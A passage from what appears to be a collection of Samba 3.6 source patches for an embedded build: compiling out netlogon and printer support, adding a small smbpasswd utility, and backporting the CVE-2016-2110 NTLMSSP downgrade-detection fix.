102 | @@ -824,6 +824,10 @@ WERROR _wkssvc_NetrJoinDomain2(struct pi
103 | WERROR werr;
104 | struct security_token *token = p->session_info->security_token;
105 |
106 | +#ifndef NETLOGON_SUPPORT
107 | + return WERR_NOT_SUPPORTED;
108 | +#endif
109 | +
110 | if (!r->in.domain_name) {
111 | return WERR_INVALID_PARAM;
112 | }
113 | @@ -901,6 +905,10 @@ WERROR _wkssvc_NetrUnjoinDomain2(struct
114 | WERROR werr;
115 | struct security_token *token = p->session_info->security_token;
116 |
117 | +#ifndef NETLOGON_SUPPORT
118 | + return WERR_NOT_SUPPORTED;
119 | +#endif
120 | +
121 | if (!r->in.account || !r->in.encrypted_password) {
122 | return WERR_INVALID_PARAM;
123 | }
124 | --- a/source3/libsmb/trusts_util.c
125 | +++ b/source3/libsmb/trusts_util.c
126 | @@ -46,9 +46,11 @@ NTSTATUS trust_pw_change_and_store_it(st
127 | NTSTATUS nt_status;
128 |
129 | switch (sec_channel_type) {
130 | +#ifdef NETLOGON_SUPPORT
131 | case SEC_CHAN_WKSTA:
132 | case SEC_CHAN_DOMAIN:
133 | break;
134 | +#endif
135 | default:
136 | return NT_STATUS_NOT_SUPPORTED;
137 | }
138 | @@ -159,6 +161,11 @@ bool enumerate_domain_trusts( TALLOC_CTX
139 | *num_domains = 0;
140 | *sids = NULL;
141 |
142 | +#ifndef NETLOGON_SUPPORT
143 | + return False;
144 | +#endif
145 | +
146 | +
147 | /* lookup a DC first */
148 |
149 | if ( !get_dc_name(domain, NULL, dc_name, &dc_ss) ) {
150 | @@ -243,6 +250,10 @@ NTSTATUS change_trust_account_password(
151 | struct cli_state *cli = NULL;
152 | struct rpc_pipe_client *netlogon_pipe = NULL;
153 |
154 | +#ifndef NETLOGON_SUPPORT
155 | + return NT_STATUS_UNSUCCESSFUL;
156 | +#endif
157 | +
158 | DEBUG(5,("change_trust_account_password: Attempting to change trust account password in domain %s....\n",
159 | domain));
160 |
161 | --- a/source3/auth/auth_domain.c
162 | +++ b/source3/auth/auth_domain.c
163 | @@ -538,7 +538,9 @@ static NTSTATUS auth_init_trustdomain(st
164 |
165 | NTSTATUS auth_domain_init(void)
166 | {
167 | +#ifdef NETLOGON_SUPPORT
168 | smb_register_auth(AUTH_INTERFACE_VERSION, "trustdomain", auth_init_trustdomain);
169 | smb_register_auth(AUTH_INTERFACE_VERSION, "ntdomain", auth_init_ntdomain);
170 | +#endif
171 | return NT_STATUS_OK;
172 | }
173 | --- a/source3/smbd/process.c
174 | +++ b/source3/smbd/process.c
175 | @@ -2431,8 +2431,10 @@ static bool housekeeping_fn(const struct
176 | /* check if we need to reload services */
177 | check_reload(sconn, time_mono(NULL));
178 |
179 | +#ifdef NETLOGON_SUPPORT
180 | /* Change machine password if neccessary. */
181 | attempt_machine_password_change();
182 | +#endif
183 |
184 | /*
185 | * Force a log file check.
186 | --- a/source3/rpc_server/srv_pipe.c
187 | +++ b/source3/rpc_server/srv_pipe.c
188 | @@ -421,10 +421,12 @@ static bool check_bind_req(struct pipes_
189 | if (ok) {
190 | context_fns->allow_connect = false;
191 | }
192 | +#ifdef NETLOGON_SUPPORT
193 | ok = ndr_syntax_id_equal(abstract, &ndr_table_netlogon.syntax_id);
194 | if (ok) {
195 | context_fns->allow_connect = false;
196 | }
197 | +#endif
198 | /*
199 | * for the epmapper and echo interfaces we allow "connect"
200 | * auth_level by default.
201 | --- a/source3/rpc_client/cli_pipe.c
202 | +++ b/source3/rpc_client/cli_pipe.c
203 | @@ -2221,6 +2221,10 @@ static void rpc_pipe_bind_step_two_trigg
204 | struct schannel_state);
205 | struct tevent_req *subreq;
206 |
207 | +#ifndef NETLOGON_SUPPORT
208 | + tevent_req_nterror(req, NT_STATUS_UNSUCCESSFUL);
209 | + return;
210 | +#endif
211 | if (schannel_auth == NULL ||
212 | !ndr_syntax_id_equal(&state->cli->abstract_syntax,
213 | &ndr_table_netlogon.syntax_id)) {
214 |
--------------------------------------------------------------------------------
/samba-patches/111-owrt_smbpasswd.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/Makefile.in
2 | +++ b/source3/Makefile.in
3 | @@ -1025,7 +1025,7 @@ TEST_LP_LOAD_OBJ = param/test_lp_load.o
4 |
5 | PASSWD_UTIL_OBJ = utils/passwd_util.o
6 |
7 | -SMBPASSWD_OBJ = utils/smbpasswd.o $(PASSWD_UTIL_OBJ) $(PASSCHANGE_OBJ) \
8 | +SMBPASSWD_OBJ = utils/owrt_smbpasswd.o $(PASSWD_UTIL_OBJ) $(PASSCHANGE_OBJ) \
9 | $(PARAM_OBJ) $(LIBSMB_OBJ) $(PASSDB_OBJ) \
10 | $(GROUPDB_OBJ) $(LIB_NONSMBD_OBJ) $(KRBCLIENT_OBJ) \
11 | $(POPT_LIB_OBJ) $(SMBLDAP_OBJ) \
12 | @@ -1813,7 +1813,7 @@ nmbd/nmbd_multicall.o: nmbd/nmbd.c nmbd/
13 | echo "$(COMPILE_CC_PATH)" 1>&2;\
14 | $(COMPILE_CC_PATH) >/dev/null 2>&1
15 |
16 | -utils/smbpasswd_multicall.o: utils/smbpasswd.c utils/smbpasswd.o
17 | +utils/smbpasswd_multicall.o: utils/owrt_smbpasswd.c utils/owrt_smbpasswd.o
18 | @echo Compiling $<.c
19 | @$(COMPILE_CC_PATH) -Dmain=smbpasswd_main && exit 0;\
20 | echo "The following command failed:" 1>&2;\
21 | @@ -1822,7 +1822,7 @@ utils/smbpasswd_multicall.o: utils/smbpa
22 |
23 | SMBD_MULTI_O = $(patsubst smbd/server.o,smbd/server_multicall.o,$(SMBD_OBJ))
24 | NMBD_MULTI_O = $(patsubst nmbd/nmbd.o,nmbd/nmbd_multicall.o,$(filter-out $(LIB_DUMMY_OBJ),$(NMBD_OBJ)))
25 | -SMBPASSWD_MULTI_O = $(patsubst utils/smbpasswd.o,utils/smbpasswd_multicall.o,$(filter-out $(LIB_DUMMY_OBJ),$(SMBPASSWD_OBJ)))
26 | +SMBPASSWD_MULTI_O = $(patsubst utils/owrt_smbpasswd.o,utils/smbpasswd_multicall.o,$(filter-out $(LIB_DUMMY_OBJ),$(SMBPASSWD_OBJ)))
27 | MULTI_O = multi.o
28 |
29 | MULTICALL_O = $(sort $(SMBD_MULTI_O) $(NMBD_MULTI_O) $(SMBPASSWD_MULTI_O) $(MULTI_O))
30 | --- /dev/null
31 | +++ b/source3/utils/owrt_smbpasswd.c
32 | @@ -0,0 +1,249 @@
33 | +/*
34 | + * Copyright (C) 2012 Felix Fietkau
35 | + * Copyright (C) 2008 John Crispin
36 | + *
37 | + * This program is free software; you can redistribute it and/or modify it
38 | + * under the terms of the GNU General Public License as published by the
39 | + * Free Software Foundation; either version 2 of the License, or (at your
40 | + * option) any later version.
41 | + *
42 | + * This program is distributed in the hope that it will be useful, but WITHOUT
43 | + * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
44 | + * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
45 | + * more details.
46 | + *
47 | + * You should have received a copy of the GNU General Public License along with
48 | + * this program; if not, write to the Free Software Foundation, Inc., 675
49 | + * Mass Ave, Cambridge, MA 02139, USA. */
50 | +
51 | +#include "includes.h"
52 | +#include
53 | +#include
54 | +
55 | +static char buf[256];
56 | +
57 | +static void md4hash(const char *passwd, uchar p16[16])
58 | +{
59 | + int len;
60 | + smb_ucs2_t wpwd[129];
61 | + int i;
62 | +
63 | + len = strlen(passwd);
64 | + for (i = 0; i < len; i++) {
65 | +#if __BYTE_ORDER == __LITTLE_ENDIAN
66 | + wpwd[i] = (unsigned char)passwd[i];
67 | +#else
68 | + wpwd[i] = (unsigned char)passwd[i] << 8;
69 | +#endif
70 | + }
71 | + wpwd[i] = 0;
72 | +
73 | + len = len * sizeof(int16);
74 | + mdfour(p16, (unsigned char *)wpwd, len);
75 | + ZERO_STRUCT(wpwd);
76 | +}
77 | +
78 | +
79 | +static bool find_passwd_line(FILE *fp, const char *user, char **next)
80 | +{
81 | + char *p1;
82 | +
83 | + while (!feof(fp)) {
84 | + if(!fgets(buf, sizeof(buf) - 1, fp))
85 | + continue;
86 | +
87 | + p1 = strchr(buf, ':');
88 | +
89 | + if (p1 - buf != strlen(user))
90 | + continue;
91 | +
92 | + if (strncmp(buf, user, p1 - buf) != 0)
93 | + continue;
94 | +
95 | + if (next)
96 | + *next = p1;
97 | + return true;
98 | + }
99 | + return false;
100 | +}
101 | +
102 | +/* returns -1 if user is not present in /etc/passwd*/
103 | +static int find_uid_for_user(const char *user)
104 | +{
105 | + FILE *fp;
106 | + char *p1, *p2, *p3;
107 | + int ret = -1;
108 | +
109 | + fp = fopen("/etc/passwd", "r");
110 | + if (!fp) {
111 | + printf("failed to open /etc/passwd");
112 | + goto out;
113 | + }
114 | +
115 | + if (!find_passwd_line(fp, user, &p1)) {
116 | + printf("User %s not found or invalid in /etc/passwd\n", user);
117 | + goto out;
118 | + }
119 | +
120 | + p2 = strchr(p1 + 1, ':');
121 | + if (!p2)
122 | + goto out;
123 | +
124 | + p2++;
125 | + p3 = strchr(p2, ':');
126 | + if (!p1)
127 | + goto out;
128 | +
129 | + *p3 = '\0';
130 | + ret = atoi(p2);
131 | +
132 | +out:
133 | + if(fp)
134 | + fclose(fp);
135 | + return ret;
136 | +}
137 | +
138 | +static void smbpasswd_write_user(FILE *fp, const char *user, int uid, const char *password)
139 | +{
140 | + static uchar nt_p16[NT_HASH_LEN];
141 | + int len = 0;
142 | + int i;
143 | +
144 | + md4hash(strdup(password), nt_p16);
145 | +
146 | + len += snprintf(buf + len, sizeof(buf) - len, "%s:%u:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:", user, uid);
147 | + for(i = 0; i < NT_HASH_LEN; i++)
148 | + len += snprintf(buf + len, sizeof(buf) - len, "%02X", nt_p16[i]);
149 | +
150 | + snprintf(buf + len, sizeof(buf) - len, ":[U ]:LCT-00000001:\n");
151 | + fputs(buf, fp);
152 | +}
153 | +
154 | +static void smbpasswd_delete_user(FILE *fp)
155 | +{
156 | + fpos_t r_pos, w_pos;
157 | + int len = strlen(buf);
158 | +
159 | + fgetpos(fp, &r_pos);
160 | + fseek(fp, -len, SEEK_CUR);
161 | + fgetpos(fp, &w_pos);
162 | + fsetpos(fp, &r_pos);
163 | +
164 | + while (fgets(buf, sizeof(buf) - 1, fp)) {
165 | + int cur_len = strlen(buf);
166 | +
167 | + fsetpos(fp, &w_pos);
168 | + fputs(buf, fp);
169 | + fgetpos(fp, &w_pos);
170 | +
171 | + fsetpos(fp, &r_pos);
172 | + fseek(fp, cur_len, SEEK_CUR);
173 | + fgetpos(fp, &r_pos);
174 | + }
175 | +
176 | + fsetpos(fp, &w_pos);
177 | + ftruncate(fileno(fp), ftello(fp));
178 | +}
179 | +
180 | +static int usage(const char *progname)
181 | +{
182 | + fprintf(stderr,
183 | + "Usage: %s [options] \n"
184 | + "\n"
185 | + "Options:\n"
186 | + " -s read password from stdin\n"
187 | + " -a add user\n"
188 | + " -x delete user\n",
189 | + progname);
190 | + return 1;
191 | +}
192 | +
193 | +int main(int argc, char **argv)
194 | +{
195 | + const char *prog = argv[0];
196 | + const char *user;
197 | + char *pw1, *pw2;
198 | + FILE *fp;
199 | + bool add = false, delete = false, get_stdin = false, found;
200 | + int ch;
201 | + int uid;
202 | +
203 | + TALLOC_CTX *frame = talloc_stackframe();
204 | +
205 | + while ((ch = getopt(argc, argv, "asx")) != EOF) {
206 | + switch (ch) {
207 | + case 's':
208 | + get_stdin = true;
209 | + break;
210 | + case 'a':
211 | + add = true;
212 | + break;
213 | + case 'x':
214 | + delete = true;
215 | + break;
216 | + default:
217 | + return usage(prog);
218 | + }
219 | + }
220 | +
221 | + if (add && delete)
222 | + return usage(prog);
223 | +
224 | + argc -= optind;
225 | + argv += optind;
226 | +
227 | + if (!argc)
228 | + return usage(prog);
229 | +
230 | + user = argv[0];
231 | + if (!delete) {
232 | + uid = find_uid_for_user(user);
233 | + if (uid < 0) {
234 | + fprintf(stderr, "Could not find user '%s' in /etc/passwd\n", user);
235 | + return 2;
236 | + }
237 | + }
238 | +
239 | + fp = fopen("/mnt/secure/etc/samba/smbpasswd", "r+");
240 | + if(!fp) {
241 | + fprintf(stderr, "Failed to open /etc/samba/smbpasswd");
242 | + return 3;
243 | + }
244 | +
245 | + found = find_passwd_line(fp, user, NULL);
246 | + if (!add && !found) {
247 | + fprintf(stderr, "Could not find user '%s' in /mnt/secure/etc/samba/smbpasswd\n", user);
248 | + return 3;
249 | + }
250 | +
251 | + if (delete) {
252 | + smbpasswd_delete_user(fp);
253 | + goto out;
254 | + }
255 | +
256 | + pw1 = get_pass("New SMB password:", get_stdin);
257 | + if (!pw1)
258 | + pw1 = strdup("");
259 | +
260 | + pw2 = get_pass("Retype SMB password:", get_stdin);
261 | + if (!pw2)
262 | + pw2 = strdup("");
263 | +
264 | + if (strcmp(pw1, pw2) != 0) {
265 | + fprintf(stderr, "Mismatch - password unchanged.\n");
266 | + goto out_free;
267 | + }
268 | +
269 | + if (found)
270 | + fseek(fp, -strlen(buf), SEEK_CUR);
271 | + smbpasswd_write_user(fp, user, uid, pw2);
272 | +
273 | +out_free:
274 | + free(pw1);
275 | + free(pw2);
276 | +out:
277 | + fclose(fp);
278 | + TALLOC_FREE(frame);
279 | +
280 | + return 0;
281 | +}
282 |
--------------------------------------------------------------------------------
/samba-patches/023-CVE-2016-2110-v3-6.patch:
--------------------------------------------------------------------------------
1 | From 202d69267c8550b850438877fb51c3d2c992949d Mon Sep 17 00:00:00 2001
2 | From: Stefan Metzmacher
3 | Date: Tue, 1 Dec 2015 08:46:45 +0100
4 | Subject: [PATCH 01/10] CVE-2016-2110: s3:ntlmssp: set and use
5 | ntlmssp_state->allow_lm_key
6 | MIME-Version: 1.0
7 | Content-Type: text/plain; charset=UTF-8
8 | Content-Transfer-Encoding: 8bit
9 |
10 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11644
11 |
12 | Signed-off-by: Stefan Metzmacher
13 | Reviewed-by: Günther Deschner
14 | ---
15 | source3/libsmb/ntlmssp.c | 4 +++-
16 | 1 file changed, 3 insertions(+), 1 deletion(-)
17 |
18 | --- a/source3/libsmb/ntlmssp.c
19 | +++ b/source3/libsmb/ntlmssp.c
20 | @@ -176,17 +176,19 @@ void ntlmssp_want_feature_list(struct nt
21 | * also add NTLMSSP_NEGOTIATE_SEAL here. JRA.
22 | */
23 | if (in_list("NTLMSSP_FEATURE_SESSION_KEY", feature_list, True)) {
24 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_SIGN;
25 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SIGN;
26 | }
27 | if (in_list("NTLMSSP_FEATURE_SIGN", feature_list, True)) {
28 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_SIGN;
29 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SIGN;
30 | }
31 | if(in_list("NTLMSSP_FEATURE_SEAL", feature_list, True)) {
32 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_SEAL;
33 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SEAL;
34 | }
35 | if (in_list("NTLMSSP_FEATURE_CCACHE", feature_list, true)) {
36 | ntlmssp_state->use_ccache = true;
37 | }
38 | +
39 | + ntlmssp_state->neg_flags |= ntlmssp_state->required_flags;
40 | }
41 |
42 | /**
43 | @@ -199,17 +201,20 @@ void ntlmssp_want_feature(struct ntlmssp
44 | {
45 | /* As per JRA's comment above */
46 | if (feature & NTLMSSP_FEATURE_SESSION_KEY) {
47 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_SIGN;
48 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SIGN;
49 | }
50 | if (feature & NTLMSSP_FEATURE_SIGN) {
51 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_SIGN;
52 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SIGN;
53 | }
54 | if (feature & NTLMSSP_FEATURE_SEAL) {
55 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_SEAL;
56 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SIGN;
57 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_SEAL;
58 | }
59 | if (feature & NTLMSSP_FEATURE_CCACHE) {
60 | ntlmssp_state->use_ccache = true;
61 | }
62 | +
63 | + ntlmssp_state->neg_flags |= ntlmssp_state->required_flags;
64 | }
65 |
66 | /**
67 | @@ -387,7 +392,12 @@ static NTSTATUS ntlmssp_client_initial(s
68 | }
69 |
70 | if (ntlmssp_state->use_ntlmv2) {
71 | - ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_NTLM2;
72 | + ntlmssp_state->required_flags |= NTLMSSP_NEGOTIATE_NTLM2;
73 | + ntlmssp_state->allow_lm_key = false;
74 | + }
75 | +
76 | + if (ntlmssp_state->allow_lm_key) {
77 | + ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_LM_KEY;
78 | }
79 |
80 | /* generate the ntlmssp negotiate packet */
81 | @@ -422,6 +432,86 @@ static NTSTATUS ntlmssp_client_initial(s
82 | return NT_STATUS_MORE_PROCESSING_REQUIRED;
83 | }
84 |
85 | +static NTSTATUS ntlmssp3_handle_neg_flags(struct ntlmssp_state *ntlmssp_state,
86 | + uint32_t flags)
87 | +{
88 | + uint32_t missing_flags = ntlmssp_state->required_flags;
89 | +
90 | + if (flags & NTLMSSP_NEGOTIATE_UNICODE) {
91 | + ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_UNICODE;
92 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_OEM;
93 | + ntlmssp_state->unicode = true;
94 | + } else {
95 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_UNICODE;
96 | + ntlmssp_state->neg_flags |= NTLMSSP_NEGOTIATE_OEM;
97 | + ntlmssp_state->unicode = false;
98 | + }
99 | +
100 | + /*
101 | + * NTLMSSP_NEGOTIATE_NTLM2 (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY)
102 | + * has priority over NTLMSSP_NEGOTIATE_LM_KEY
103 | + */
104 | + if (!(flags & NTLMSSP_NEGOTIATE_NTLM2)) {
105 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_NTLM2;
106 | + }
107 | +
108 | + if (ntlmssp_state->neg_flags & NTLMSSP_NEGOTIATE_NTLM2) {
109 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_LM_KEY;
110 | + }
111 | +
112 | + if (!(flags & NTLMSSP_NEGOTIATE_LM_KEY)) {
113 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_LM_KEY;
114 | + }
115 | +
116 | + if (!(flags & NTLMSSP_NEGOTIATE_ALWAYS_SIGN)) {
117 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_ALWAYS_SIGN;
118 | + }
119 | +
120 | + if (!(flags & NTLMSSP_NEGOTIATE_128)) {
121 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_128;
122 | + }
123 | +
124 | + if (!(flags & NTLMSSP_NEGOTIATE_56)) {
125 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_56;
126 | + }
127 | +
128 | + if (!(flags & NTLMSSP_NEGOTIATE_KEY_EXCH)) {
129 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_KEY_EXCH;
130 | + }
131 | +
132 | + if (!(flags & NTLMSSP_NEGOTIATE_SIGN)) {
133 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_SIGN;
134 | + }
135 | +
136 | + if (!(flags & NTLMSSP_NEGOTIATE_SEAL)) {
137 | + ntlmssp_state->neg_flags &= ~NTLMSSP_NEGOTIATE_SEAL;
138 | + }
139 | +
140 | + if ((flags & NTLMSSP_REQUEST_TARGET)) {
141 | + ntlmssp_state->neg_flags |= NTLMSSP_REQUEST_TARGET;
142 | + }
143 | +
144 | + missing_flags &= ~ntlmssp_state->neg_flags;
145 | + if (missing_flags != 0) {
146 | + NTSTATUS status = NT_STATUS_RPC_SEC_PKG_ERROR;
147 | + DEBUG(1, ("%s: Got challenge flags[0x%08x] "
148 | + "- possible downgrade detected! "
149 | + "missing_flags[0x%08x] - %s\n",
150 | + __func__,
151 | + (unsigned)flags,
152 | + (unsigned)missing_flags,
153 | + nt_errstr(status)));
154 | + debug_ntlmssp_flags(missing_flags);
155 | + DEBUGADD(4, ("neg_flags[0x%08x]\n",
156 | + (unsigned)ntlmssp_state->neg_flags));
157 | + debug_ntlmssp_flags(ntlmssp_state->neg_flags);
158 | +
159 | + return status;
160 | + }
161 | +
162 | + return NT_STATUS_OK;
163 | +}
164 | +
165 | /**
166 | * Next state function for the Challenge Packet. Generate an auth packet.
167 | *
168 | @@ -448,6 +538,26 @@ static NTSTATUS ntlmssp_client_challenge
169 | DATA_BLOB encrypted_session_key = data_blob_null;
170 | NTSTATUS nt_status = NT_STATUS_OK;
171 |
172 | + if (!msrpc_parse(ntlmssp_state, &reply, "CdBd",
173 | + "NTLMSSP",
174 | + &ntlmssp_command,
175 | + &server_domain_blob,
176 | + &chal_flags)) {
177 | + DEBUG(1, ("Failed to parse the NTLMSSP Challenge: (#1)\n"));
178 | + dump_data(2, reply.data, reply.length);
179 | +
180 | + return NT_STATUS_INVALID_PARAMETER;
181 | + }
182 | + data_blob_free(&server_domain_blob);
183 | +
184 | + DEBUG(3, ("Got challenge flags:\n"));
185 | + debug_ntlmssp_flags(chal_flags);
186 | +
187 | + nt_status = ntlmssp3_handle_neg_flags(ntlmssp_state, chal_flags);
188 | + if (!NT_STATUS_IS_OK(nt_status)) {
189 | + return nt_status;
190 | + }
191 | +
192 | if (ntlmssp_state->use_ccache) {
193 | struct wbcCredentialCacheParams params;
194 | struct wbcCredentialCacheInfo *info = NULL;
195 | @@ -498,17 +608,6 @@ static NTSTATUS ntlmssp_client_challenge
196 |
197 | noccache:
198 |
199 | - if (!msrpc_parse(ntlmssp_state, &reply, "CdBd",
200 | - "NTLMSSP",
201 | - &ntlmssp_command,
202 | - &server_domain_blob,
203 | - &chal_flags)) {
204 | - DEBUG(1, ("Failed to parse the NTLMSSP Challenge: (#1)\n"));
205 | - dump_data(2, reply.data, reply.length);
206 | -
207 | - return NT_STATUS_INVALID_PARAMETER;
208 | - }
209 | -
210 | if (DEBUGLEVEL >= 10) {
211 | struct CHALLENGE_MESSAGE *challenge = talloc(
212 | talloc_tos(), struct CHALLENGE_MESSAGE);
213 | @@ -525,13 +624,6 @@ noccache:
214 | }
215 | }
216 |
217 | - data_blob_free(&server_domain_blob);
218 | -
219 | - DEBUG(3, ("Got challenge flags:\n"));
220 | - debug_ntlmssp_flags(chal_flags);
221 | -
222 | - ntlmssp_handle_neg_flags(ntlmssp_state, chal_flags, lp_client_lanman_auth());
223 | -
224 | if (ntlmssp_state->unicode) {
225 | if (chal_flags & NTLMSSP_NEGOTIATE_TARGET_INFO) {
226 | chal_parse_string = "CdUdbddB";
227 | @@ -769,6 +861,7 @@ NTSTATUS ntlmssp_client_start(TALLOC_CTX
228 | ntlmssp_state->unicode = True;
229 |
230 | ntlmssp_state->use_ntlmv2 = use_ntlmv2;
231 | + ntlmssp_state->allow_lm_key = lp_client_lanman_auth();
232 |
233 | ntlmssp_state->expected_state = NTLMSSP_INITIAL;
234 |
235 | @@ -780,6 +873,10 @@ NTSTATUS ntlmssp_client_start(TALLOC_CTX
236 | NTLMSSP_NEGOTIATE_KEY_EXCH |
237 | NTLMSSP_REQUEST_TARGET;
238 |
239 | + if (ntlmssp_state->use_ntlmv2) {
240 | + ntlmssp_state->allow_lm_key = false;
241 | + }
242 | +
243 | ntlmssp_state->client.netbios_name = talloc_strdup(ntlmssp_state, netbios_name);
244 | if (!ntlmssp_state->client.netbios_name) {
245 | talloc_free(ntlmssp_state);
246 | --- a/libcli/auth/ntlmssp.h
247 | +++ b/libcli/auth/ntlmssp.h
248 | @@ -83,6 +83,7 @@ struct ntlmssp_state
249 | DATA_BLOB nt_resp;
250 | DATA_BLOB session_key;
251 |
252 | + uint32_t required_flags;
253 | uint32_t neg_flags; /* the current state of negotiation with the NTLMSSP partner */
254 |
255 | /**
256 |
--------------------------------------------------------------------------------
/samba-patches/200-remove_printer_support.patch:
--------------------------------------------------------------------------------
1 | --- a/source3/rpc_server/rpc_ep_setup.c
2 | +++ b/source3/rpc_server/rpc_ep_setup.c
3 | @@ -1110,6 +1110,10 @@ bool dcesrv_ep_setup(struct tevent_conte
4 | "rpc_server",
5 | "spoolss",
6 | "embedded");
7 | +#ifndef PRINTER_SUPPORT
8 | + if (1) {
9 | + } else
10 | +#endif
11 | if (StrCaseCmp(rpcsrv_type, "embedded") == 0) {
12 | spoolss_cb.init = spoolss_init_cb;
13 | spoolss_cb.shutdown = spoolss_shutdown_cb;
14 | --- a/source3/rpcclient/rpcclient.c
15 | +++ b/source3/rpcclient/rpcclient.c
16 | @@ -624,7 +624,9 @@ static struct cmd_set *rpcclient_command
17 | lsarpc_commands,
18 | ds_commands,
19 | samr_commands,
20 | +#ifdef PRINTER_SUPPORT
21 | spoolss_commands,
22 | +#endif
23 | netlogon_commands,
24 | srvsvc_commands,
25 | dfs_commands,
26 | --- a/source3/printing/spoolssd.c
27 | +++ b/source3/printing/spoolssd.c
28 | @@ -165,6 +165,10 @@ void start_spoolssd(struct tevent_contex
29 | NTSTATUS status;
30 | int ret;
31 |
32 | +#ifndef PRINTER_SUPPORT
33 | + return;
34 | +#endif
35 | +
36 | DEBUG(1, ("Forking SPOOLSS Daemon\n"));
37 |
38 | pid = sys_fork();
39 | --- a/source3/utils/net_rpc.c
40 | +++ b/source3/utils/net_rpc.c
41 | @@ -7841,6 +7841,10 @@ int net_rpc_printer(struct net_context *
42 | {NULL, NULL, 0, NULL, NULL}
43 | };
44 |
45 | +#ifndef PRINTER_SUPPORT
46 | + return 0;
47 | +#endif
48 | +
49 | if (argc == 0) {
50 | if (c->display_usage) {
51 | d_printf(_("Usage:\n"));
52 | --- a/source3/smbd/reply.c
53 | +++ b/source3/smbd/reply.c
54 | @@ -5255,7 +5255,11 @@ void reply_printopen(struct smb_request
55 | return;
56 | }
57 |
58 | - if (!CAN_PRINT(conn)) {
59 | +
60 | +#ifdef PRINTER_SUPPORT
61 | + if (!CAN_PRINT(conn))
62 | +#endif
63 | + {
64 | reply_nterror(req, NT_STATUS_ACCESS_DENIED);
65 | END_PROFILE(SMBsplopen);
66 | return;
67 | @@ -5361,7 +5365,10 @@ void reply_printqueue(struct smb_request
68 | is really quite gross and only worked when there was only
69 | one printer - I think we should now only accept it if they
70 | get it right (tridge) */
71 | - if (!CAN_PRINT(conn)) {
72 | +#ifdef PRINTER_SUPPORT
73 | + if (!CAN_PRINT(conn))
74 | +#endif
75 | + {
76 | reply_nterror(req, NT_STATUS_ACCESS_DENIED);
77 | END_PROFILE(SMBsplretq);
78 | return;
79 | --- a/source3/smbd/lanman.c
80 | +++ b/source3/smbd/lanman.c
81 | @@ -784,6 +784,10 @@ static bool api_DosPrintQGetInfo(struct
82 | union spoolss_JobInfo *job_info = NULL;
83 | union spoolss_PrinterInfo printer_info;
84 |
85 | +#ifndef PRINTER_SUPPORT
86 | + return False;
87 | +#endif
88 | +
89 | if (!str1 || !str2 || !p) {
90 | return False;
91 | }
92 | @@ -999,6 +1003,10 @@ static bool api_DosPrintQEnum(struct smb
93 | union spoolss_DriverInfo *driver_info;
94 | union spoolss_JobInfo **job_info;
95 |
96 | +#ifndef PRINTER_SUPPORT
97 | + return False;
98 | +#endif
99 | +
100 | if (!param_format || !output_format1 || !p) {
101 | return False;
102 | }
103 | @@ -3105,6 +3113,10 @@ static bool api_RDosPrintJobDel(struct s
104 | struct spoolss_DevmodeContainer devmode_ctr;
105 | enum spoolss_JobControl command;
106 |
107 | +#ifndef PRINTER_SUPPORT
108 | + return False;
109 | +#endif
110 | +
111 | if (!str1 || !str2 || !p) {
112 | return False;
113 | }
114 | @@ -3238,6 +3250,10 @@ static bool api_WPrintQueueCtrl(struct s
115 | struct sec_desc_buf secdesc_ctr;
116 | enum spoolss_PrinterControl command;
117 |
118 | +#ifndef PRINTER_SUPPORT
119 | + return False;
120 | +#endif
121 | +
122 | if (!str1 || !str2 || !QueueName) {
123 | return False;
124 | }
125 | @@ -3404,6 +3420,10 @@ static bool api_PrintJobInfo(struct smbd
126 | union spoolss_JobInfo info;
127 | struct spoolss_SetJobInfo1 info1;
128 |
129 | +#ifndef PRINTER_SUPPORT
130 | + return False;
131 | +#endif
132 | +
133 | if (!str1 || !str2 || !p) {
134 | return False;
135 | }
136 | @@ -4547,6 +4567,10 @@ static bool api_WPrintJobGetInfo(struct
137 | struct spoolss_DevmodeContainer devmode_ctr;
138 | union spoolss_JobInfo info;
139 |
140 | +#ifndef PRINTER_SUPPORT
141 | + return False;
142 | +#endif
143 | +
144 | if (!str1 || !str2 || !p) {
145 | return False;
146 | }
147 | @@ -4685,6 +4709,10 @@ static bool api_WPrintJobEnumerate(struc
148 | uint32_t count = 0;
149 | union spoolss_JobInfo *info;
150 |
151 | +#ifndef PRINTER_SUPPORT
152 | + return False;
153 | +#endif
154 | +
155 | if (!str1 || !str2 || !p) {
156 | return False;
157 | }
158 | @@ -4890,6 +4918,10 @@ static bool api_WPrintDestGetInfo(struct
159 | struct spoolss_DevmodeContainer devmode_ctr;
160 | union spoolss_PrinterInfo info;
161 |
162 | +#ifndef PRINTER_SUPPORT
163 | + return False;
164 | +#endif
165 | +
